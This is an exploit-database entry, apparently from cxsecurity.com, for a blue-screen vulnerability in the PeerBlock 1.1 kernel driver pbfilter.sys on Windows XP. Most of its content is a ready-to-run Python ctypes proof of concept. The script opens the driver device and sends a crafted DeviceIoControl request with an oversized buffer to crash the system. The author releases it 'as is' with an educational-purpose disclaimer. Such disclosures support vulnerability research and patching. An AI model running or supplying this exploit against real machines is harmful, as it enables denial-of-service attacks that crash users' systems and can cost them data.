PeerBlock 1.1 BSOD

2012-02-09 / 2012-02-10
Credit: shinnai
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

====================================================================================================== PeerBlock 1.1 BSOD Author: shinnai mail: shinnai[at]autistici[dot]org site: http://www.shinnai.altervista.org/ This was written for educational purpose. Use it at your own risk. Author will be not responsible for any damage. Tested on: Microsoft Windows XP Professional 5.1.2600 Service Pack 3 Build 2600 X86-based PC Info: PoC released as is, I have no time at the moment for further investigations - ----------------------------------------------------------------------- FILE INFO: (http://www.peerblock.com/) - ----------------------------------------------------------------------- File: C:\Program Files\PeerBlock\pbfilter.sys MD5 hash: 2f6e885c432927a186c2e352c8a1cbf4 ============================================================================================================================== ============================================================================================================================== Proof of concept: from ctypes import * kernel32 = windll.kernel32 Psapi = windll.Psapi if __name__ == '__main__': GENERIC_READ = 0x80000000 GENERIC_WRITE = 0x40000000 OPEN_EXISTING = 0x3 CREATE_ALWAYS = 0x2 SYM_NAME = "\\\\.\\pbfilter" dwReturn = c_ulong() out_buff = "A" * 4000 in_buff = ("") handle = kernel32.CreateFileA(SYM_NAME, GENERIC_READ | GENERIC_WRITE,0, None, CREATE_ALWAYS, 0, None) dev_ioct = kernel32.DeviceIoControl(handle, 0xabab, in_buff,len(in_buff), out_buff, len(out_buff),byref(dwReturn), None) ===========================


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top